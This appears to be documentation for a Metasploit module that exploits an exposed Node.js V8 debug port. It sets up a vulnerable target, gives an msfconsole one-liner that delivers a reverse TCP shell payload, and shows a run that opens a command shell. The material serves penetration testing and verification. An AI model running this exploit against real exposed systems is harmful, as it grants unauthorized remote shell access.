1.9 KiB
Vulnerable Application
Current and historical versions of node (or any JS env based on the V8 JS engine) have this functionality and could be exploitable if configured to expose the JS port on an untrusted interface.
Install a version of node using any of the normal methods:
- Vendor: https://nodejs.org/en/download/package-manager/
- Distro:
sudo apt-get install nodejs
Alternately, use standard node docker containers as targets:
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
(Others at https://hub.docker.com/_/node/)
Tested on Node 7.x, 6.x, 4.x
Verification Steps
- Run a node process exposing the debug port
node --debug=0.0.0.0:5858
- Exploit it and catch the callback:
msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
Scenarios
Example Run (Node 7.x)
Victim:
$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
>
(To exit, press ^C again or type .exit)
Attacker:
msf exploit(nodejs_v8_debugger) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
id
(redacted)